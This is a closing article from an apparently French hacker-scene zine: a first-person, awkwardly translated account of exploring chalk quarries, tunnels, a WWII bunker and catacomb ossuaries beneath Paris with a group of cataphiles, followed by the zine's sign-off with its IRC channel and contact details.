>>La cave de craie
Nous sommes rejoints par trois autres cataphiles hommes, dont l' anglais est aussi 
pietre que mon francais.  J' attends le dernier moment pour mettre mon casque-torche 
de speleologie. L' entree est en fait une fissure de roche, dans des bois eloignes. 
Heureusement, il y a une echelle, d' a peu pres 10 m de hauteur. Je suis immediatement 
subjugue par la beaute de cet ensemble. Pas de claustrophobie ici. Ce sont plus des 
cavernes que des tunnels.  Emmanuel laisse sortir un cri - quelque chose qu' apparement 
il execute a chaque descente. Il n' y a pas d' echo. Les murs de craie absorbent tout. 
Les autres nous rejoignent.    Notre guide nous mene par le labyrinthe en ayant jamais 
besoin d'une carte. Ca semble bien indique mais je ne pourrais jamais retrouver mon 
chemin arrire. Il dirige sa lampe aux points de danger - fissures soudaines, puits 
sans fond - aucuns rails de guide ici. Des machines sont abandonnees ici depuis des 
decennies. On observe des signes de visitation precedent - bouteilles en plastique, 
bidons, batteries jetees.  Une echelle rachitique mene vers le haut d un mur emiette,
a un trou de lapin dans le plafond et, des promesses d'Emmanuel, a un niveau superieur. 
Nous serrons un par un. Ici, c' est tridimensionnel.Il y a au-dessus de et ci-dessous 
et autre ci-dessous et... dans la mesure ou vous pouvez aller.  Mais maintenant je 
comprends pourquoi on vient ici. Il y a pas loin un balcon - une vue ouverte de la 
ligne des tunnels ci-dessous. Et c'est un endroit pour faire le camp. Nous nous 
asseyons pour nous reposer. Lentement, sans instruction, chacun arrte sa lampe ou 
la lampe-torche pour se trouver dans l' obscurite - totalement noir. Et silencieux. 
Pas un bruit. Aucune goutture. Rien. RIEN!! Je n'ai jamais eprouve quelque chose comme 
ca. Vous ne devez pas fermer vos yeux. Le tombeau d'un homme est le refuge d'un autre 
homme. 		
 		
Enfin Emmanuel me demande d' allumer ma lampe-torche pour lui permettre d' allumer 
la sienne. Il saisit son sac  dos. Les autres commencent un feu avec du propane 
liquide et ouvrent des boites de confit de piment. Nous conversons tranquillement, 
en franais et anglais.  Emmanuel allume et plante une bougie a chaque intersection 
du tunnel. Un autre moment magique. Je pense  Robert Smithston. Terrassements 
- 30 ans aprs - cette fois sous la terre.  Au retour d' Emmanuel, j' ose poser une 
question stupide: 'Pourquoi le faites-vous?' " pour laver mon cerveau, " il ose, suivi 
d'un rire explosif. " c'est un autre monde, mais c'est notre monde. Il y a une culture. 
Personne ne peut nous toucher ici. " 		
 		
Quelques km de carriere de pierre a chaux plus tard, nous sautons a cloche-pied une 
barriere pour nous retrouver dans une autre carriere. Quelqu'un cultivait des 
champignons et collectait des pommes de terre ici. C' etait un veritable desordre 
organique, accompagne d' un camion Citroen. Il doit etre 5 ou 6 h du matin, nous 
sommes tous fatigues. Nous decidons de nous arreter a cet endroit, caracterise par 
des sculptures sur les murs.  Nous partimes par des rues desertes de Paris, alors que 
l' aube se cassait sur l' horizon de la ville. Benito ronfle profondement sur le 
siege arriere; au moins, il maintient Emmanuel eveille. Il mentionne en passant une 
soute allemande de la deuxieme guerre mondiale, sous un lycee pres des jardins du 
luxembourgeois.  Dans les tunnels Le vendredi au soir, j' ai pris le Metro le plus 
au sud a la Porte d'Orleans, puis j' ai marche, un peu perdu. Ca n' etait pas sur 
ma carte. Emmanuel et deux nouveaux m' attendaient au coin d' une rue de la banlieue. 
La scene etait digne de ' L' Exorciste '. Hmmm.  Stephane, trentaine d' annees, et 
Jean-Baptiste, vingtaine d' annees, se donnent la peine de pratiquer leur anglais, 
et me controlent poliment a l' exterieur. Oui, je peux consacrer 8 a 9 heures de mon 
temps. Oui, je peux continuer. J' avais l' impression que la nuit precedente n' etait 
en fait qu' un test pour quelque chose.... d' important, de serieux. C' etaient des 
caves. A present ce sont des tunnels. Il y a une difference.  Et, encore une fois, 
le rituel. Enfiler les bottes et la tenue dans la rue. Un pieton passe avec son chien, 
mais il nous ignore. Mais trois jeunes garcons attachent un velo a un poteau et 
inclinent la tete. Ils se dirigent vers une petite entree. Nous les suivons quelques 
minutes plus tard.  Au milieu de poubelles et de meubles usagers, Emmanuel se fraye 
un chemin jusqu' a un mur de briques - notre entree. Notre trou de souris. Cette 
fois taille dans un bloc de ciment. Les autres prennent le chemin. L' entree est 
vraiment etroite. Je me contorsionne, puis je chute... dans l' obscurite. Je m' etale 
au sol, puis m' ecarte. Je ne me blesse pas, et je ne blesse personne, c' est un bon 
debut.  A gauche, il y a une piece, une sorte de station. Les trois jeunes emergent, 
sans avoir l' air etonne. Emmanuel les interroge. Ils n' ont pas de carte. Ils ne vont 
pas loin. Ils partent. Ils devraient mieux ne pas aller trop loin s' ils ne veulent 
pas se perdre. Notre salle d' attente a une nuance de...rose. Stephane est le coupable, 
il a eu un rabais pour un lot de pots de peinture. En fait, il avait deja blanchi un 
des murs en surface, mais quelqu' un avait trahi l' entree du tunnel.  Ils terminent 
tranquillement leurs cigarettes dans le silence. Il est temps de partir.  

Les perils 
C' est une marche, une marche obligatoire. Nous avons beaucoup de chemin a faire. 
Nous suivons le chemin de fer ci-dessus. Vers notre droite sur le mur du tunnel il 
y a des supports en metal tenant des cables. Un eglissade ou erreur de calcul et 
vous etes empale. Et ces gars bougent vraiment vite.  Cela ne prend pas longtemps 
pour que je comprenne le probleme. Vous devez suivre la personne qui se tient devant 
vous. La postluminescence de sa torche eclaire votre voie. Et dans notre prochain 
tunnel le plafond est irregulier et beaucoup plus bas. Nous nous tapissons, marchant 
comme des singes. J' essaie de marcher dans les pas de mon predecesseur, comme dans 
la neige. Nous marchons dans l' eau, profonde d' environ 40 cm. J' essaie de regler 
ma respiration, et de ne pas tomber.C'est beaucoup plus dur que ce que j' avais 
imagine.  Une fois hors de l' eau, le plafond baissa considerablement. Apres 20 mn 
de marche, ce labyrinthe devient incroyable. Il y a beaucoup de tunnels, beaucoup 
de choix. Si je les perd ou que je traine, je ne retrouverai jamais mon chemin 
arriere. Je pourrais etre delaisse ici a tourner pour toujours. Heureusement mes 
guides savent ou ils vont. Je n' ai qu' a continuer. 		
 		
Mais c' est dur. Il y a tellement de choses a voir, et ils ne s' arrentent que pour 
les choses les plus etranges.Comme preciser et commenter le detail architectural le 
plus mysterieux. Les pierres angulaires avec les noms et les dates de rue m'intriguent. 
Elles sont belles et changent d'une manire extravagante de 1777  1890. Mais mes 
guides parlent de la construction anarchique du tunnel. Et ils montrent les 
graffitis des periodes revolutionnaires - 1789 et 1968. C'est trop trange! Il 
n' y a pas de SDF ici. C' est trop secret, et la police a scelle toutes les 
entrees a l' interieur de la ville.  J' entends quelque chose - musique? Je 
demande aux autres de s' arreter. Silence. Ils ne me croient pas. Nous avoncons 
de quelques pas, et ils commencent eux aussi a l' entendre. Emmanuel me pousse 
pour se rapprocher de la source sonore.  Nous ecoutons. Aucun son. Mais une 
lumiere s' approche, accompagnee de voix eloignees. Emmanuel me regarde. "C' est 
de l' anglais?". Avant que je ne puisse repondre, il maudit les touristes. Quatre 
types, quatre filles. Ils amorcent un sourire, et nous saluent dans un anglais casse.
" Avez-vous vu la police? " Nope. " Elle nous a chassee  'La Plage' ." Emmanuel 
semble dubitatif. Ces dbutants sont fiers, ils viennent directement d'Allemagne. 
Emmanuel se dirige vers moi, et dit " Eh bien, il est Canadien." Le leader appelle 
Emmanuel-frre. " Il n'aime pas cela et il reste assez froid avec eux. Ils le sentent 
et restent distants aussi. J'ai jet un coup d'oeil sur la carte de leur guide. 
Elle etait vieille et limitee. Emmanuel verifia que ces touristes ne nous suivaient 
pas.  Pendant que nous marchons, Emmanuel a cette habitude de regarder et verifier 
le moindre trou dans les parois. Je devine qu' il y avait autrefois des bougies et 
des statues religieuses gardees la, mais personnelement, je prefere ne pas y aventurer 
mes mains. Finalement il s' arrete et recupere un morceau de papier au sol. C' est un 
tract sur l' extreme speleo/cataphile. C' est vieux et humide. Emmanuel le garde pour 
sa collection. Il a des centaines de dessins, schemas, magazines, laisses par les 
visiteurs.  Ma montre est cachee dans ma poche, ce qui la protege des murs erailles, 
mais je n' ai vraiment aucune envie de savoir quelle heure il est. Nous rentrons a 
temps, mais par chemin quelque peu illogique. Il y a des milliers de km de souterrain 
ici. Nous sommes dans un musee sous-terrain, mais les expositions sont hors 
chronologie, 1850, 1777, 1941... J' apercois a present un grafiti fluorescent - 
l' annee derniere, la semaine derniere, hier? Apres une longue ligne droite, Stephane 
montre un trou dans une paroi du tunnel. "Bunker - plus tard". 		
 		
Heureusement ces types s'arpentent. Il est temps de se reposer. Nous entrons dans une 
petite caverne. Une fois que nous l'avons eclairee avec des bougies et des lampes mes 
guides s'embarquent sur un exercice des plus curieux - plantant des piquets et broyants 
les pilliers soutenant cette cave en forme de piece. Ceci me semble assez dangereux. 
Cet endroit est creuse dans de la roche incertaine et les piliers sont seulement des 
pierres empiles les unes sur les autres. Et, a chaque coup, les parties du plafond 
semblent se desagreger et tomber sur nous. Je me retire a l'entree, pret a plonger 
dehors dans le tunnel, plus sur.  Stephane est le premier a reussir et etire une 
bache entre deux piquets. Il s' etend soigneusement dans son hamac improvise tout 
en souriant pendant que les autres continuent et echouent malheureusement. Alors un 
de ses 2 piquets vole soudainement hors du mur, et il s' ecrase lamentablement sur 
le dur sol de la caverne. Nous sommes tous morts de rire. Je suis sous Paris avec 
les trois faire-valoir francais.  Pour le diner, ils chauffent des boites de confit 
de canard et sortent du pain et du vin. J'offre de l' eau et des barres energetiques. 
Ils me regardent curieusement. Jean Baptiste: " hachish? " Je leur suggere de les 
garder pour le dessert ;)  Stephane est un garcon curieux. Il a passe 4 ans a fusionner 
des cartes techniques (je ne me demande meme pas pourquoi ou comment il les a obtenues) 
avec ses propres explorations sous-terraines. Toutes les fois que nous trouvons quelque 
chose de nouveau, ou quelque chose d' etrange, il l' annote sur un cahier. La carte 
entire est un fichier gant de Photoshop qu'il a imprim en Suisse. Alors qu'elle est 
noire et blanche, elle montre plus de six niveaux. Le reve de Stephane est de produire 
une version en couleur. Pourquoi la fait-il? Puisque personne d'autre ne l' a fait. 
Puisqu'il est la. Et a propos de sa famille? Il a deja emmene deux de ces gamins dans 
des caves. Ils ont aime.  Emmanuel nous decrit une rencontre avec un couple plutot 
etrange et un enfant de 10 ans dans les tunnels l' annee derniere. Je demande si 
c' est frequent qu' ils rencontrent des gens ici. Souvent personne, parfois un ou 
deux voyageurs. Aucun d'eux n'a rencontr la police redoutee du tunnel. Emmanuel est 
sceptique a propos de la course-poursuite des allemands.  Je lui demande s' il n' est 
jamais devenu un peu fou. Il me repond que ca lui etait deja arrive d' entendre du 
reggae et de voir des lumieres quand il venait seul.  Jean Baptiste est d' un type 
plus silencieux; plus jeune que Stephane, moins obsede. Il me confie qu' il a une 
liberte ici qui n'existe pas en haut. Et j'ai le sentiment que c' est un homme 
diffrent ici.  Lors des voyages de camping vous vous asseyez en arriere et ecoutez 
le vent dans les arbres ou les animaux eloignes. Vous vous prenez dans le silence 
noir. Je ne sais pas pour combien de temps nous nous asseyons la.  

Le Bunker 
La methode pour entrer est assez simple, mais c' est aussi comique: vous passez 
la tete la premiere, et votre coequipier vous pousse a travers. Les tunnels changent 
encore d' architecture. Nous sommes censes etre sous un lycee. Nous sommes censment 
sous un lyce. Je devine que les gosses ne se rendent jamais ici. Mais les Allemands 
l' ont fait. La plupart des vestiges des Nazis sont maintenant partis du bunker, mais 
il reste des avertissements, comme " RAUCHEN VERBOTEN ", et des portes scellees en 
metal qui ressemblent a celles d' un sous-marin U2. Et il y a beaucoup de salles - 
petites salles. Je n' ose imaginer a quoi elles servaient. 		
 		
Emmanuel sort du tunnel pour entrer dans un Bunker. 		
Il y a beaucoup de cables electriques et de conduits montes sur les murs - ce qui 
me laisse penser que c' etait un Bunker de transmissions. Mes yeux commencent a 
s' acoutumer, et je peux observer une trame de metal blanc dans une autre piece. 
Les lamelles en bois se sont desagregees et se sont dissoutes dans le plancher en 
pierre. Tout le monde est silencieux, chacun observe seul. Stephane se dirige a une 
fissure dans le mur. Je suis sur de ne pas passer cette fois, mais il y est deja 
parti. Les autres regardent pour voir si je suivrai. Je me lance finalement, apres 
avoir jete mon sac a terre.  Il faut grimper, puis ramper vers le bas. J' ai environ 
10 cm de jeu de chaque cote. Je ne me suis jamais autant senti enterre vivant. Et il 
n'y a aucune extremite en vue. La plus legere secousse, et nous sommes tous ecrases. 
Personne ne nous entendra. Personne ne nous trouvera. Pourquoi est-ce que je fais ca? 
Je n'ai pas le temps de repondre. Il y a un type derrire moi et je dois continuer. 
Je figure que nous rampons 6 ou 7 m avant la sortie. Je peux gouter la poussiere. 
Mes nerfs me massacrent. Mais nous retrouvons le sourire a la sortie. Ce stupide 
sourire que les hommes esquissent lorsqu' ils ont fait quelque chose de viril 
ensemble. Nous sommes de retour dans les tunnels. 		
 		
Nouveaux Tunnels? 
Je me depeche pour rattraper mes trois camarades a la prochaine 
intersection. Il n'y a aucun repere de rue. Stephane etudie sa carte. Jean Baptiste 
la saisit, la tourne a 180 degres - le signe international du dsaccord spatial. Ils 
discutent. Je n'ai besoin d'aucune traduction. Je sais qu'aucun d'eux ne porte une 
boussole. Clairement, nous sommes detruits. La plupart des hommes paniqueraient. Ces 
trois-ci sont hyper-joyeux. Territoire inconnu!  Stephane me sourit. En me prenant 
avec eux, ils ont ete recompenses. J'ai porte bonheur. Je suis neanmoins tres 
inquiet, et mes genoux tremblent.  Nous sommes de veritables explorateurs maintenant. 
A chaque intersection, Stephane trace une serie de lignes sur sa carte. Ces tunnels 
semblent... differents. Ils ne sont pas lisses, et il y a des signes d' eboulements.  
Emmanuel pousse tout a coup un cri aigu, et me dit de m' approcher. Il est suspendu 
au-dessus d' un bassin d' eau totalement claire. Il me dit que personne n' est venu 
ici depuis tres longtemps.  Comme nos cartographes continuent leur travail, je me 
tourne vers Emmanuel pour quelques renseignements. Il me raconte que ce sont des 
tunnels d' essais, pour controler les fondations des batiments voisins et 
l' uniformite de la terre. Ils ont probablement estime qu' il etait trop dangereux 
de les construire ici. 		
 		
Stephane est si fier de sa nouvelle decouverte. La fatigue me gange, les grimaces 
aussi. Meme ces types ont leurs limites. Les boulots en surface et la colere des 
epouses fachees reviennent en memoire. Mais Emmanuel est honorable en un point. 
Il me demande si je veux toujours voir les vraies catacombes? Je ne me demonte pas. 
" Mais bien sur ", je rponds. Les autres sourient, fiers de moi. Mais ils pensent 
a leurs foyers.  Les vraies Catacombes Il n' y eut plus beaucoup d' arrets, ainsi 
quand celui-ci s' est presente de lui-meme, nous nous sommes assis. Au milieu de 
la salle se trouve un escalier miniature, une sculpture. Quelque chose de fait 
avec les 15 genres de pierre de la zone. Stephane et Jean Baptiste se concentrent 
pour fournir a Emmanuel les sections adequates de la carte pour faciliter notre 
retour. J'entends encore cette musique. Mais avant que je ne puisse reagir, ils 
etaient la - nos huit touristes allemands continuant leur chemin. Ils nous 
rejoignent et choisissent Emmanuel pour prendre leur photo. Puis, de nouveau, 
ils partirent aussi rapidement qu'ils etaient apparus.  Nous observons leur 
lumire disparaitre en bas du mur de tunnel.  Nous zig-zagons pendant un moment 
puis suivons alors quelques escaliers en pierre antiques vers un autre niveau. 
Les vrais catacombes ne sont pas aussi ordonnees que la version des touristes. 
Aucunes croix faites  partir des lignes des crnes ici. Des os sont repandus 
aux environs. Alors Emmanuel me montre les galeries laterales. Les os ont ete 
empiles pour toujours sur 60 a 80 cm de hauteur dans des tunnels qui vont... 
dans l'obscurit. Il y a une paire de gants de latex a l'entree. Emmanuel est 
silencieux. C'est l' endroit ou les tares viennent, me dit-il. J' ai peur de 
demander pourquoi. Il semble que quelques-uns prennent leur pied a se jeter 
sur ce tas d' os. Surfer dans le puits de l' humanite. Je regrette de ne pas 
avoir demande maintenant.  Tellement de choses a voir, si peu de temps. Mais 
nous pensons a nos foyers. Peut-etre une heure et demie si nous nous deplacons 
vite. Mais Emmanuel est nerveux. Il veut eviter 'La Plage', vu que les Allemands 
les ont avertis que les flics rodaient dans ce coin.  Nous n' allons prendre 
aucun risque, et nous empruntons un detour. Mon guide est finalement heureux 
de pouvoir controler. Plusieurs fois Emmanuel regarde sa carte. Puis soudainement 
deux jeunes types - d' une vingtaine d' annees - passent. Ce sont des hommes en 
mission. Un simple " Salut " et ils continuent leur chemin. Emmanuel montre peu 
d'interet a les suivre. Nous continuons sur notre chemin, mais nous sommes perdus 
pendant un moment. Enfin il consulte la carte une fois de plus, puis m'assure que 
nous sommes seulement a une demi-heure de la fin.  Quand nous frappons l'eau il 
tout revient. Cette fois je glisse. Nous nous precipitons. Je suis fatigue, 
impatient. Je me cogne la tete. Emmanuel se retourne, il l'a entendu. Je sens le 
sang mais j'incline la tete et nous continuons en fonction. Je prends appuis avec 
ma main sur le mur, en evitant les metaux.  On se trouvait a present dehors. 
Emmanuel me laisse partir. Triste de dire " au revoir " a mon guide, mon aventurier 
de camarade, mais nous sommes tous les deux fatigues. Et il est un homme de peu 
de mots. Nous sourions, inclinons la tete. " A la prochaine".  " A plus tard ". 
Emmanuel conduit en surface comme il voyage en-dessous. Des cris, des 
manifestations etranges.  Je suis sur un des premiers trains du nord. Mes cheveux 
sont en desordre, je suis couvert de salete. C'est une merveille qu'ils ne 
m'arretent pas. Mais personne n' en prend note. J'ai juste passe dix heures sous 
Paris avec un groupe de cataphiles fous, de trafiquants de drogue et de touristes 
extremes. Devant moi maintenant, premiers banlieusards de matin. Je sais que 
je suis remonte, mais alors que le metro accelere je me rappelle ou je suis vraiment. 
Il n' y a juste qu' une foule en plus, mais nous sommes encore sous terre.  

[ pour vous servir: vatoo]		



(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )       Ze End !!!          )    2.13   (            vatoo          (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


Voila pour ce deuxieme numero de notre zine. On espere sincerement qu' il vous 
aura plu, que vous lui ferez de la pub, que vous lirez le prochain, et surtout 
que vous participiez! On insiste bien sur le fait que vous pouvez nous contatcer 
tres librement, en venant sur notre chann (#cryptel / IRCNet), en vous exprimant 
sur le forum de notre site (http://www.altern.org/cryptel bah oui, notre domaine 
est mort :( ), ou en nous envoyant un petit mail a cryptel@altern.org . . .
Si vous avez des idees originales d' articles, des sujets, des demandes, ou des 
textes a nous soumettre, c' est cette email qu' il faut utiliser.

And don' t forget to defonce your head the 31 december!!!

